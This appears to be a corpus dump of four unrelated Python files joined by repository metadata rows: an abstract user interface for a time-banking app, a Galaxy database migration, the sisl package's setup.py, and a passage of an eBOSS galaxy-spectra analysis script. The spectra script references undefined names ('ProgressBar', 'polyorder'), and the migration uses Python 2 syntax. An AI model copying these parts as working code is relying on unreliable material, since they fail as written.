"""
return
@abc.abstractmethod
def register_job_done(self, job_number, job_creator_mail, helped_one_email=None, new_time=0):
"""
Registers a job as done (with the new time to put).
The helped one will be warned by email and will be able to accept the 'payment' or not
:param job_number: it's the number of the job created by the job_creator_mail
:param job_creator_mail: The mail of the creator of the job
:param helped_one_email: it can't be None
:param new_time:
:return: False if there was a problem and True otherwise.
"""
return
def accept_help(self, job_number, job_creator_mail, helper_email):
"""
Chooses the member (with email stored in 'helper_email') to do the job (with id stored in 'number')
The chosen helper is warned by email
:param job_number: it's the number of the job created by the job_creator_mail
:param job_creator_mail: The mail of the creator of the job
:param helper_email:
:return: False if there was a problem and True otherwise
"""
return
@abc.abstractmethod
def create_job(self, branch_name, title, description, is_demand, frequency, category, visibility,
date='', start_time='', km=0, duration='', other_category='', place='', recursive_day=''):
"""
Creates a help offer (the parameters will be used to fill the database).
:param branch_name: The branch to which belongs the job
:param date: The date of the job
:param is_demand: True if it's a demand, false otherwise
:param start_time: The hour of the beginning of the job in minute. Example : 14h30 -> 14*60+30 = 870
:param frequency: The frequency of the job. (0=Once, 1=daily, 2=weekly, ...)
:param km: The number of km to do the job
:param duration: The job's duration approximation
:param category: The category of the job. (1=shopping, 2=visit, 3=transport)
:param place: A description of the job's location
:param visibility: Which people can see the job.
:return: False if there was a problem and True otherwise.
"""
return
@abc.abstractmethod
def delete_job(self, job_number):
"""
Delete the job of the user with the number 'job_number'
:param job_number: The number of the job of the user to delete.
"""
return
def accept_bill(self, job_number, job_creator_mail, amount):
"""
Accepts the bill and transfers money to the helper
:param job_number: it's the number of the job created by the job_creator_mail
:param job_creator_mail: The mail of the creator of the job
:param amount: amount of the bill
:return: False if there was a problem and True otherwise.
"""
return
def refuse_bill(self, job_number, job_creator_mail):
"""
Refuses the bill and warns the branch officer by email
:param job_number: it's the number of the job created by the job_creator_mail
:param job_creator_mail: The mail of the creator of the job
:return: False if there was a problem and True otherwise.
"""
return
def transfer_time(self, destination_email, time, message):
"""
Transfers 'time' to a member with 'destination_email' as email
:param destination_email: the email address of the member to transfer time
:return: False if there was a problem and True otherwise.
"""
return
def make_donation(self, time, message, branch_name=None):
"""
Makes a donation to the branch of the member
:param branch_name:
:param time:
:return:
"""
return
def delete_member_from_branch(self, branch_name, deleted_one_email):
"""
Delete the member from the branch
:param branch_name: The name of the branch that the branch_officer belongs to
:param deleted_one_email: The mail of the member the branch_officer want to remove from
the branch.
:return: False if there was a problem and True otherwise.
"""
return
def delete_member_from_site(self, deleted_one_email):
"""
Put the status of the member as deleted (TODO add a deleted field to member ?)
:param deleted_one_email: the email of the person to delete
:return: False if there was a problem and True otherwise.
"""
return
def log_as_member(self, email, session):
"""
Logs the current user as the one specified by the email (by modifying the session variables)
:param email: the email of the member to log in as
:param session: the dictionary containing the session variables
:return: False if there was a problem and True otherwise.
"""
return
def give_branch_control(self, branch_name, new_branch_officer_email):
"""
Set the control of a branch to an another branch_officer, which is represented by his mail
:param branch_name: the name of the branch that will change of the branch_officer
:param new_branch_officer_email: the new branch_officer that will control the branch
:return: False if there was a problem and True otherwise.
"""
return
def modify_tag_member(self, email, new_tag):
"""
Modify the tag of the member represented by the email,
and set his tag to the new_tag
:param email: mail of the member we need to modify the tag
:param new_tag: new tag to assign to the member
:return: False if there was a problem and True otherwise.
"""
return
def transfer_money_from_branch(self, time, branch_name, destination_email):
"""
Make a gift by taking some time from the branch to the member represented
by the destinaion_mail.
:param time: the amount of time that we give as a gift
:param branch_name: the branch that give the donation
:param destination_email: the member that receive the donation
:return: False if there was a problem and True otherwise.
"""
return
def create_branch(self, name, branch_town, branch_officer_email=None, street='', zip='', town=''):
"""
Create a new branch with the parameter
:param name: name of the new branch
:param town: town of the new branch
:param branch_officer_email: mail of the branch_officer that will manage the branch
:param address: address of the branch, for meeting, or other
:return: False if there was a problem and True otherwise.
"""
return
def remove_branch(self, branch_name):
"""
Remove a branch from the application
:param branch_name: the name of the branch to remove
:return: False if there was a problem and True otherwise.
"""
return
def transfer_bp_admin_rights(self, new_bp_admin_email):
"""
The bp admin abandon his rights, and give them to someone else.
:param new_bp_admin_email:
:return: False if there was a problem and True otherwise.
"""
return
def add_favorite(self, favorite_mail):
"""
Add a favorite to self
:param favorite_mail : the mail of the favorite
:return : false if the member is not added to favorites (because it doesn't exist for example)
"""
return
def remove_favorite(self, favorite_mail):
"""
Remove a favorite to self
:param favorite_mail : the mail of the favorite
:return : false if the member is not removed from favorites (because it doesn't exist for example)
"""
return
@abc.abstractmethod
def is_member_visible(self, member):
"""
:param member:
:return: True if the member is visible for the current user and False otherwise
"""
return
@abc.abstractmethod
def get_visible_members(self, branch):
"""
:param branch: if it is not None, it gets only the members that are in a specific branch
:return: the list of the visible members (of the branch specified if the parameter is not set to None)
"""
return
@abc.abstractmethod
def change_status(self, active):
"""
:param active
:return: True
"""
return
def is_branch_officer(self, member):
"""
:param member:
:return: True if the current user is the branch officer of the member
"""
return | dsarkozi/care4care-sdp-grp4 | Care4Care/C4CApplication/meta/user.py | Python | agpl-3.0 | 11,424 | [
"VisIt"
] | ca12f763401985ef6ce760caab51c1b4746349f36bb652d8a5d4c39d2de74506 |
"""
Migration script to alter the type of the tool_dependency.version column from TrimmedString(40) to Text.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import datetime
now = datetime.datetime.utcnow
# Need our custom types, but don't import anything else from model
from galaxy.model.custom_types import *
import sys, logging
log = logging.getLogger( __name__ )
log.setLevel(logging.DEBUG)
handler = logging.StreamHandler( sys.stdout )
format = "%(name)s %(levelname)s %(asctime)s %(message)s"
formatter = logging.Formatter( format )
handler.setFormatter( formatter )
log.addHandler( handler )
metadata = MetaData()
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print __doc__
metadata.reflect()
ToolDependency_table = Table( "tool_dependency", metadata, autoload=True )
# Change the tool_dependency table's version column from TrimmedString to Text.
if migrate_engine.name in ['postgresql', 'postgres']:
cmd = "ALTER TABLE tool_dependency ALTER COLUMN version TYPE Text;"
elif migrate_engine.name == 'mysql':
cmd = "ALTER TABLE tool_dependency MODIFY COLUMN version Text;"
else:
# We don't have to do anything for sqlite tables. From the sqlite documentation at http://sqlite.org/datatype3.html:
# 1.0 Storage Classes and Datatypes
# Each value stored in an SQLite database (or manipulated by the database engine) has one of the following storage classes:
# NULL. The value is a NULL value.
# INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.
# REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.
# TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).
# BLOB. The value is a blob of data, stored exactly as it was input.
cmd = None
if cmd:
try:
migrate_engine.execute( cmd )
except Exception, e:
log.debug( "Altering tool_dependency.version column from TrimmedString(40) to Text failed: %s" % str( e ) )
def downgrade(migrate_engine):
metadata.bind = migrate_engine
# Not necessary to change column type Text to TrimmedString(40).
pass
| mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/lib/galaxy/model/migrate/versions/0100_alter_tool_dependency_table_version_column.py | Python | gpl-3.0 | 2,354 | [
"Galaxy"
] | 874357bbbd552666e22a15ea4b688ce9bce37749e88a3a13e43088e3397d355f |
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at https://mozilla.org/MPL/2.0/.
"""
Manipulating of DFT output, geometries and creating tight-binding parameter sets for NEGF transport
"""
# We have used a paradigm following pandas and Cython web-page documentation.
if __doc__ is None:
__doc__ = """Manipulating of DFT output, geometries and creating tight-binding parameter sets for NEGF transport"""
DOCLINES = __doc__.split("\n")
import sys
import multiprocessing
import os
# pkg_resources is part of setuptools
import pkg_resources
# We should *always* import setuptools prior to Cython/distutils
import setuptools
def _ospath(path):
""" Changes '/' separators to OS separators """
return os.path.join(*path.split('/'))
# Macros for use when compiling stuff
macros = []
try:
import Cython
# if available we can cythonize stuff
_CYTHON_VERSION = Cython.__version__
from Cython.Build import cythonize
# We currently do not have any restrictions on Cython (I think?)
# If so, simply put it here, and we will not use it
_CYTHON_INSTALLED = True
except ImportError:
_CYTHON_VERSION = None
_CYTHON_INSTALLED = False
cythonize = lambda x, *args, **kwargs: x # dummy func
if _CYTHON_INSTALLED:
# The import of Extension must be after the import of Cython, otherwise
# we do not get the appropriately patched class.
# See https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html
# Now we can import cython distutils
from Cython.Distutils.old_build_ext import old_build_ext as cython_build_ext
cython = True
else:
cython = False
# Allow users to remove cython step (forcefully)
# This may break compilation, but at least users should be aware
if "--no-cythonize" in sys.argv:
sys.argv.remove("--no-cythonize")
cython = False
# Check if users requests coverage of Cython sources
if "--with-cython-coverage" in sys.argv:
linetrace = True
sys.argv.remove("--with-cython-coverage")
else:
linetrace = False
# Define Cython directives
# We shouldn't rely on sources having the headers filled
# with directives.
# Cleaner to have them here, and possibly on a per file
# basis (if needed).
# That could easily be added at ext_cython place
directives = {"linetrace": False, "language_level": 3}
if linetrace:
# https://pypkg.com/pypi/pytest-cython/f/tests/example-project/setup.py
directives["linetrace"] = True
directives["emit_code_comments"] = True
macros.extend([("CYTHON_TRACE", "1"), ("CYTHON_TRACE_NOGIL", "1")])
# Check if users requests checking fortran passing copies
if "--f2py-report-copy" in sys.argv:
macros.append(("F2PY_REPORT_ON_ARRAY_COPY", "1"))
sys.argv.remove("--f2py-report-copy")
# We will *only* use setuptools
# Although setuptools is not shipped with the standard library, I think
# this is ok since it should get installed pretty easily.
from setuptools import Command, Extension
from setuptools import find_packages, find_namespace_packages
# Patch to allow fortran sources in setup
# build_ext requires numpy setup
# Also for extending build schemes we require build_ext from numpy.distutils
from distutils.command.sdist import sdist
from numpy.distutils.command.build_ext import build_ext as numpy_build_ext
from numpy.distutils.core import Extension as FortranExtension
from numpy.distutils.core import setup
from numpy import __version__ as np_version
print(f"sisl-build: numpy.__version__ = {np_version}")
if not cython:
cython_build_ext = numpy_build_ext
# Custom command classes
cmdclass = {}
# Now create the build extensions
class CythonCommand(cython_build_ext):
"""
Custom distutils command subclassed from Cython.Distutils.build_ext
to compile pyx->c, and stop there. All this does is override the
C-compile method build_extension() with a no-op.
"""
def build_extension(self, ext):
pass
if cython:
# we have cython and generate c codes directly
suffix = ".pyx"
cmdclass["cython"] = CythonCommand
else:
suffix = ".c"
# Retrieve the compiler information
from numpy.distutils.system_info import get_info
# use flags defined in numpy
all_info = get_info('ALL')
# Define compilation flags
extra_compile_args = ""
extra_link_args = extra_compile_args
# in numpy>=1.16.0, silence build warnings about deprecated API usage
macros.append(("NPY_NO_DEPRECATED_API", "0"))
# Do not expose multiple platform Cython code.
# We do not need it
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#integrating-multiple-modules
macros.append(("CYTHON_NO_PYINIT_EXPORT", "1"))
class EnsureSource_sdist(sdist):
"""Ensure Cython has runned on all pyx files (i.e. we need c sources)."""
def initialize_options(self):
super().initialize_options()
def run(self):
if "cython" in cmdclass:
self.run_command("cython")
else:
for ext, ext_d in ext_cython.items():
pyx = ext_d.get("pyxfile", f"{ext}.pyx")
source = f"{pyx[:-4]}.c"
msg = (f".c-source file '{source}' not found.\n"
"Run 'setup.py cython' to convert {pyx} to {source} before sdist."
)
assert os.path.isfile(source), msg
super().run()
cmdclass["sdist"] = EnsureSource_sdist
# Cython extensions can't be merged as a single module
# It requires a single source file.
# In this scheme all modules are named the same as their pyx files.
# If the module name should change, simply manually put the pyxfile.
ext_cython = {
"sisl._indices": {},
"sisl._math_small": {},
"sisl._sparse": {
"depends": [_ospath("sisl/_indices.pxd")]
},
"sisl._supercell": {},
"sisl.physics._bloch": {},
"sisl.physics._phase": {},
"sisl.physics._matrix_utils": {},
"sisl.physics._matrix_k": {},
"sisl.physics._matrix_dk": {},
"sisl.physics._matrix_ddk": {},
"sisl.physics._matrix_phase3": {},
"sisl.physics._matrix_phase3_nc": {},
"sisl.physics._matrix_phase3_so": {},
"sisl.physics._matrix_phase": {},
"sisl.physics._matrix_phase_nc_diag": {},
"sisl.physics._matrix_phase_nc": {},
"sisl.physics._matrix_phase_so": {},
"sisl.physics._matrix_sc_phase": {
"depends": [_ospath("sisl/_sparse.pxd")]
},
"sisl.physics._matrix_sc_phase_nc_diag": {
"depends": [_ospath("sisl/_sparse.pxd"),
_ospath("sisl/physics/_matrix_utils.pxd")
]
},
"sisl.physics._matrix_sc_phase_nc": {
"depends": [_ospath("sisl/_sparse.pxd"),
_ospath("sisl/physics/_matrix_utils.pxd")
]
},
"sisl.physics._matrix_sc_phase_so": {
"depends": [_ospath("sisl/_sparse.pxd"),
_ospath("sisl/physics/_matrix_utils.pxd")
]
},
}
# List of extensions for setup(...)
extensions = []
for name, data in ext_cython.items():
# Create pyx-file name
# Default to module name + .pyx
pyxfile = data.get("pyxfile", f"{name}.pyx").replace(".", os.path.sep)
extensions.append(
Extension(name,
sources=[f"{pyxfile[:-4]}{suffix}"] + data.get("sources", []),
depends=data.get("depends", []),
include_dirs=data.get("include", []),
language=data.get("language", "c"),
define_macros=macros + data.get("macros", []),
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args)
)
# Specific Fortran extensions
ext_fortran = {
"sisl.io.siesta._siesta": {
"sources": [_ospath(f"sisl/io/siesta/_src/{f}") for f in
["io_m.f90",
"siesta_sc_off.f90",
"hsx_read.f90", "hsx_write.f90",
"dm_read.f90", "dm_write.f90",
"tshs_read.f90", "tshs_write.f90",
"grid_read.f90", "grid_write.f90",
"gf_read.f90", "gf_write.f90",
"tsde_read.f90", "tsde_write.f90",
"hs_read.f90",
"wfsx_read.f90"]
],
},
}
for name, data in ext_fortran.items():
ext = FortranExtension(name,
sources=data.get("sources"),
depends=data.get("depends", []),
include_dirs=data.get("include", None),
define_macros=macros + data.get("macros", []),
extra_compile_args=extra_compile_args,
extra_link_args=extra_link_args,
)
extensions.append(ext)
class EnsureBuildExt(numpy_build_ext):
"""
Override build-ext to check whether compilable sources are present
This merely pretty-prints a better error message.
Note we require build_ext to inherit from numpy.distutils since
we need fortran sources.
"""
def check_cython_extensions(self, extensions):
for ext in extensions:
for src in ext.sources:
if not os.path.exists(src):
print(f"{ext.name}: -> {ext.sources}")
raise Exception(
f"""Cython-generated file '{src}' not found.
Cython is required to compile sisl from a development branch.
Please install Cython or download a release package of sisl.
""")
def build_extensions(self):
self.check_cython_extensions(self.extensions)
numpy_build_ext.build_extensions(self)
# Override build_ext command (typically called by setuptools)
cmdclass["build_ext"] = EnsureBuildExt
# Run cythonizer
def cythonizer(extensions, *args, **kwargs):
"""
Skip cythonizer (regardless) when running
* clean
* sdist
Otherwise if `cython` is True, we will cythonize sources.
"""
if "clean" in sys.argv or "sdist" in sys.argv:
# https://github.com/cython/cython/issues/1495
return extensions
elif not cython:
raise RuntimeError("Cannot cythonize without Cython installed.")
import argparse
# Allow parallel flags to be used while cythonizing
parser = argparse.ArgumentParser()
parser.add_argument("-j", type=int, dest="parallel")
parser.add_argument("--parallel", type=int, dest="parallel")
parsed, _ = parser.parse_known_args()
if parsed.parallel:
kwargs["nthreads"] = max(0, parsed.parallel)
# Extract Cython extensions
# And also other extensions to store them
other_extensions = []
cython_extensions = []
for ext in extensions:
if ext.name in ext_cython:
cython_extensions.append(ext)
else:
other_extensions.append(ext)
return other_extensions + cythonize(cython_extensions, *args, quiet=False, **kwargs)
# This will locate all sisl* packages
packages = find_packages()
# This requires some name-mangling provided by 'package_dir' option
# Using namespace packages allows others to provide exactly the same package
# without causing namespace problems.
packages += map(lambda x: f"sisl_toolbox.{x}", find_namespace_packages(where="toolbox"))
# Please update MANIFEST.in file for stuff to be shipped in the distribution.
# Otherwise we should use package_data to ensure it gets installed.
package_data = {p: ["*.pxd"] for p in packages}
package_data["sisl_toolbox.siesta.minimizer"] = ["*.yaml"]
metadata = dict(
# Correct the cmdclass
cmdclass=cmdclass,
# Ensure the packages are being found in the correct locations
package_dir={"sisl_toolbox": "toolbox"},
# This forces MANIFEST.in usage
include_package_data=True,
package_data=package_data,
packages=packages,
ext_modules=cythonizer(extensions, compiler_directives=directives),
)
cwd = os.path.abspath(os.path.dirname(__file__))
if not os.path.exists(_ospath(cwd + "/PKG-INFO")):
# Generate Cython sources, unless building from source release
# generate_cython()
pass
if __name__ == "__main__":
# Freeze to support parallel compilation when using spawn instead of fork
multiprocessing.freeze_support()
setup(**metadata)
| zerothi/sisl | setup.py | Python | mpl-2.0 | 12,319 | [
"SIESTA"
] | 387df997096a41c0df48b22d57400e226ca22b2040df0a463636d5be1dc009b3 |
"""
__license__ = "MIT"
__author__ = "Guangtun Ben Zhu (BGT) @ Johns Hopkins University"
__startdate__ = "2016.01.27"
__name__ = "cnn"
__module__ = "Network"
__lastdate__ = "2016.01.27"
__version__ = "0.01"
"""
# Python 2 to 3
from os.path import isfile, join
import numpy as np
from scipy.stats import nanmean, nanmedian
import fitsio
import lmfit
import datapath
import allinonespec as aio
import sdssspec as sdssspec
import cosmology as cosmo
_EPS = 1E-5
# prefixes
_allinone_observer_bands = ['OPTICAL']
_allinone_rest_bands = ['NUV', 'OPTICAL', 'NIR']
_allinone_observer_fileprefix = 'AIO_ELG_eBOSS_ObserverFrame_'
_allinone_rest_fileprefix = 'AIO_ELG_eBOSS_SDSSRestFrame_'
_elgfile = 'spAll-ELG-v5.4-zQ.fits'
_compositefile = 'feiimgii_composite.fits'
_bootstrap_compositefile = 'feiimgii_composite_bootstrap.fits'
_nbootstrap = 100
_minmaxwave = [3600., 10400.]
_contmask = np.array([[2200., 2249.88-7.],
[2260.78+6., 2297.58-10.],
[2297.58+6., 2324.21-7.],
[2344.21+6., 2365.36-7.],
[2396.36+6., 2422.56-7.],
[2425.14+6., 2470.97-7.],
[2471.09+6., 2510.00-7.],
[2511.00+6., 2576.88-7.],
[2626.45+6., 2796.35-7.],
[2803.53+6., 2852.96-7.],
[2852.96+6., 2900.]])
_oiimask = np.array([[3100., 3189.67-7.],
[3189.67+7., 3700.]])
#_o3mask = np.array([[4750., 4863.-13.],
_o3mask = np.array([[4920, 4959.-7.],
[4959.+6., 5007.-7.],
[5007.+7., 5040.]])
_zmin = 0.6
_zmax = 1.2
_zcorr = 10./3.E5 # redshift correction, 10 km/s
# 2/3/4/5 bins
def make_oiiewbins(zmin=_zmin, zmax=_zmax):
"""
"""
nbin = 2+3+4+5
oiiewmin = np.zeros(nbin)
oiiewmax = np.zeros(nbin)
oiiewbin = np.zeros(nbin)
oiiewmin[0:2] = [_EPS, 50.0]
oiiewmax[0:2] = [50.0, 200.]
oiiewmin[2:2+3] = [_EPS, 40.0, 70.0]
oiiewmax[2:2+3] = [40.0, 70.0, 200.]
oiiewmin[5:5+4] = [_EPS, 30.0, 50.0, 80.0]
oiiewmax[5:5+4] = [30.0, 50.0, 80.0, 200.]
oiiewmin[9:9+5] = [_EPS, 25.0, 45.0, 60.0, 90.0]
oiiewmax[9:9+5] = [25.0, 45.0, 60.0, 90.0, 200.]
oiilummin = np.zeros(nbin)
oiilummax = np.zeros(nbin)
oiilumbin = np.zeros(nbin)
oiilummin[0:2] = [40.0, 41.6]
oiilummax[0:2] = [41.6, 43.5]
oiilummin[2:2+3] = [40.0, 41.4, 41.8]
oiilummax[2:2+3] = [41.4, 41.8, 43.5]
oiilummin[5:5+4] = [40.0, 41.3, 41.6, 41.9]
oiilummax[5:5+4] = [41.3, 41.6, 41.9, 43.5]
oiilummin[9:9+5] = [40.0, 41.2, 41.5, 41.7, 42.0]
oiilummax[9:9+5] = [41.2, 41.5, 41.7, 42.0, 43.5]
# Calculate the medians
objs_ori = elg_readin()
vac_objs = elg_readin(vac=True)
nobj = objs_ori.size
zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
oiiew = vac_objs['OIIEW'][zindex]
logoiilum = np.log10(vac_objs['OIILUM'][zindex])
for i in np.arange(nbin):
oiiewbin[i] = nanmedian(oiiew[((oiiew>oiiewmin[i]) & (oiiew<oiiewmax[i]))])
oiilumbin[i] = nanmedian(logoiilum[((logoiilum>oiilummin[i]) & (logoiilum<oiilummax[i]))])
return (oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin)
def elg_filename(vac=False):
path = datapath.sdss_path()
if (not vac):
return join(path, 'eBOSS', _elgfile)
else:
return join(path, 'eBOSS', 'VAGC_'+_elgfile)
def feiimgii_composite_filename(bootstrap=False, binoii=False):
path = datapath.sdss_path()
if bootstrap:
if (not binoii):
return join(path, 'eBOSS', _bootstrap_compositefile)
else:
return join(path, 'eBOSS', 'OII_'+_bootstrap_compositefile)
else:
if (not binoii):
return join(path, 'eBOSS', _compositefile)
else:
return join(path, 'eBOSS', 'OII_'+_compositefile)
def feiimgii_composite_readin(bootstrap=False, binoii=False):
"""
"""
infile = feiimgii_composite_filename(bootstrap=bootstrap, binoii=binoii)
return (fitsio.read(infile))[0]
def elg_readin(vac=False):
infile = elg_filename(vac=vac)
if isfile(infile):
if (not vac):
return fitsio.read(infile, ext=1)
else:
return (fitsio.read(infile, ext=1))[0]
else:
raise IOError("Can't find file {0}.".format(infile))
def allinone_rest_filename(band):
return aio.allinone_filename(band, prefix=_allinone_rest_fileprefix)
def allinone_observer_filename(band):
return aio.allinone_filename(band, prefix=_allinone_observer_fileprefix)
def rest_allspec(overwrite=False):
"""Load and interpolate *ALL* eBOSS ELG spectra
on to the same rest-frame wavelength grid
"""
path1 = join(datapath.sdss_path(), 'v5_7_6')
path2 = join(datapath.sdss_path(), 'specDR12')
# check output files
bands = _allinone_rest_bands
for thisband in bands:
# check outfiles
outfile = allinone_rest_filename(thisband)
if isfile(outfile) and not overwrite:
print("File {0} exists. Use overwrite to overwrite it.".format(outfile))
return -1
# print "Will write into these files: {0}".format(outfile)
# read in the elg catalog
objs_ori = elg_readin()
nobj = objs_ori.size
# make a temporary new catalog
objs_dtype = [('PLATE', 'i4'),
('MJD', 'i4'),
('FIBER', 'i4'),
('RA', 'f8'),
('DEC', 'f8'),
('Z', 'f8')]
objs = np.zeros(nobj, dtype=objs_dtype)
objs['PLATE'] = objs_ori['PLATE_1']
objs['MJD'] = objs_ori['MJD']
objs['FIBER'] = objs_ori['FIBERID_1']
objs['RA'] = objs_ori['PLUG_RA']
objs['DEC'] = objs_ori['PLUG_DEC']
objs['Z'] = objs_ori['Z']
# read in master wavelength grid
master_wave = (aio.allinone_wave_readin())[0]['WAVE']
master_loglam = np.log10(master_wave)
nwave = master_wave.size
# initialization, nobj second dimension because of NMF traditions
rest_allflux = np.zeros((nwave, nobj))
rest_allivar = np.zeros((nwave, nobj))
#rest_allflux = np.zeros((nwave, 10))
#rest_allivar = np.zeros((nwave, 10))
# Progress bar
pbar = ProgressBar(maxval=nobj).start()
#for i in np.arange(10):
for i in np.arange(nobj):
# Progress bar
pbar.update(i)
tmpz = objs[i]['Z']
# Wavelength
wave_pos = np.array([3600./(1.+tmpz), 10400./(1.+tmpz)])
rest_loc = np.searchsorted(master_wave, wave_pos)
tmp_loglam = master_loglam[rest_loc[0]:rest_loc[1]]
# read and interpolate
try:
tmp_outflux, tmp_outivar = sdssspec.load_interp_spec(objs[i], tmp_loglam, path1, rest=True)
rest_allflux[rest_loc[0]:rest_loc[1],i] = tmp_outflux
rest_allivar[rest_loc[0]:rest_loc[1],i] = tmp_outivar
except (IndexError, TypeError, NameError, ValueError):
try:
tmp_outflux, tmp_outivar = sdssspec.load_interp_spec(objs[i], tmp_loglam, path2, rest=True)
rest_allflux[rest_loc[0]:rest_loc[1],i] = tmp_outflux
rest_allivar[rest_loc[0]:rest_loc[1],i] = tmp_outivar
except (IndexError, TypeError, NameError, ValueError):
print("Error reading plate {0} mjd {1} fiber {2}".format(objs[i]['PLATE'], objs[i]['MJD'], objs[i]['FIBER']))
# output
#Progress bar
pbar.finish()
# write out
print("Now I am writing everything out...")
allinone_rest_writeout(objs, master_wave, rest_allflux, rest_allivar, overwrite=overwrite)
def allinone_rest_writeout(objs, wave, flux, ivar, overwrite=False):
"""Write out into an AllInOne file in the rest frame
"""
# check output files
bands = _allinone_rest_bands
for thisband in bands:
# check outfiles
outfile = allinone_rest_filename(thisband)
if isfile(outfile) and not overwrite:
print("File {0} exists. Use overwrite to overwrite it.".format(outfile))
# print "Will write into these files: {0}".format(outfile)
# wavelength range
wavebase = aio.allinone_wavebase(thisband)
index_wave = np.searchsorted(wave, wavebase)
nwave = index_wave[1] - index_wave[0]
# U R here.
# objects with redshift in the covered range
index_obj = (np.where(np.logical_and((objs['Z'] > (_minmaxwave[0]/wave[index_wave[1]]-1.-0.001)), (objs['Z'] <= (_minmaxwave[1]/wave[index_wave[0]]-1.+0.001)))))[0]
if index_obj.size>0:
outstr_dtype = [('INDEX_OBJ', 'i4', (index_obj.size,)),
('RA', 'f8', (index_obj.size,)), ('DEC', 'f8', (index_obj.size,)), ('Z', 'f4', (index_obj.size,)),
('INDEX_WAVE', 'i4', (2,)),
('WAVE', 'f4', (nwave, )),
('FLUX', 'f4', (nwave, index_obj.size)),
('IVAR', 'f4', (nwave, index_obj.size))]
outstr = np.array([(index_obj,
objs[index_obj]['RA'], objs[index_obj]['DEC'], objs[index_obj]['Z'],
index_wave,
wave[index_wave[0]:index_wave[1]],
flux[index_wave[0]:index_wave[1], index_obj],
ivar[index_wave[0]:index_wave[1], index_obj])],
dtype=outstr_dtype)
fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
fits.write(outstr)
fits.close()
def allinone_rest_readin_band(band):
infile = allinone_rest_filename(band)
if isfile(infile):
print("Reading {0}.".format(infile))
return (fitsio.read(infile))[0]
else:
raise IOError("Can't find {0}".format(infile))
def rest_allspec_readin():
# read in the elg catalog
objs_ori = elg_readin()
nobj = objs_ori.size
# read in master wavelength grid
master_wave = (aio.allinone_wave_readin())[0]['WAVE']
master_loglam = np.log10(master_wave)
nwave = master_wave.size
# initialization, nobj second dimension because of NMF traditions
rest_allflux = np.zeros((nwave, nobj))
rest_allivar = np.zeros((nwave, nobj))
bands = _allinone_rest_bands
for thisband in bands:
data = allinone_rest_readin_band(thisband)
index_wave = data['INDEX_WAVE']
index_obj = data['INDEX_OBJ']
rest_allflux[index_wave[0]:index_wave[1], index_obj] = data['FLUX']
rest_allivar[index_wave[0]:index_wave[1], index_obj] = data['IVAR']
master_wave = master_wave*(1.+_zcorr)
return (master_wave, rest_allflux, rest_allivar)
def make_mask(wave, oii=False, o3=False):
"""
"""
mask = np.zeros(wave.size, dtype='bool')
if oii:
for i in np.arange((_oiimask.shape)[0]):
mask[(wave>_oiimask[i,0]) & (wave<_oiimask[i,1])] = True
elif o3:
for i in np.arange((_o3mask.shape)[0]):
mask[(wave>_o3mask[i,0]) & (wave<_o3mask[i,1])] = True
else:
for i in np.arange((_contmask.shape)[0]):
mask[(wave>_contmask[i,0]) & (wave<_contmask[i,1])] = True
return mask
def calculate_continuum(loglam, flux, ivar, mask, polyorder=2):
"""
"""
x = loglam[(mask) & (ivar>0)]
y = flux[(mask) & (ivar>0)]
if (x.size>0):
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
cont = p(loglam)
else:
cont = np.ones(loglam.shape)
return cont
def calculate_continuum_powerlaw(loglam, flux, ivar, mask):
"""
"""
x = loglam[(mask) & (ivar>0)]
y = flux[(mask) & (ivar>0)]
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
cont = p(loglam)
return cont
def value_add_elg(overwrite=False):
"""
"""
# Check output file
outfile = elg_filename(vac=True)
if isfile(outfile) and not overwrite:
print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
return -1
Mpc_cm = 3.08568025E24
objs_ori = elg_readin()
nobj = objs_ori.size
z = objs_ori['Z']
(master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
# OII luminosity and equivalent width
oiilum = np.zeros(nobj)
oiiew = np.zeros(nobj)
index_oii = np.searchsorted(master_wave, 3728.48)
dnoiiwave = 10
dwave = np.median(master_wave[index_oii-dnoiiwave:index_oii+dnoiiwave]-master_wave[index_oii-dnoiiwave-1:index_oii+dnoiiwave-1])
print("dwave: {0}".format(dwave))
oiisum = np.sum(rest_allflux[index_oii-dnoiiwave:index_oii+dnoiiwave, :]*(rest_allivar[index_oii-dnoiiwave:index_oii+dnoiiwave, :]>0), axis=0)*dwave
print("allfinite: {0}".format(np.count_nonzero(np.isfinite(oiisum))))
oii_left = np.sum(rest_allflux[index_oii-25:index_oii-15, :]*(rest_allivar[index_oii-25:index_oii-15, :]>0), axis=0)/(25.-15.)
oii_right = np.sum(rest_allflux[index_oii+15:index_oii+25, :]*(rest_allivar[index_oii+15:index_oii+25, :]>0), axis=0)/(25.-15.)
oii_cont = (oii_left+oii_right)/2.
oiiew = (oiisum-oii_cont*dwave)/oii_cont
oiilum = (oiisum-oii_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
index_oiii = np.searchsorted(master_wave, 5008.24)
dnoiiiwave = 10
dwave = np.median(master_wave[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave]-master_wave[index_oiii-dnoiiiwave-1:index_oiii+dnoiiiwave-1])
print("dwave: {0}".format(dwave))
oiiisum = np.sum(rest_allflux[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave, :]*(rest_allivar[index_oiii-dnoiiiwave:index_oiii+dnoiiiwave, :]>0), axis=0)*dwave
print("allfinite: {0}".format(np.count_nonzero(np.isfinite(oiiisum))))
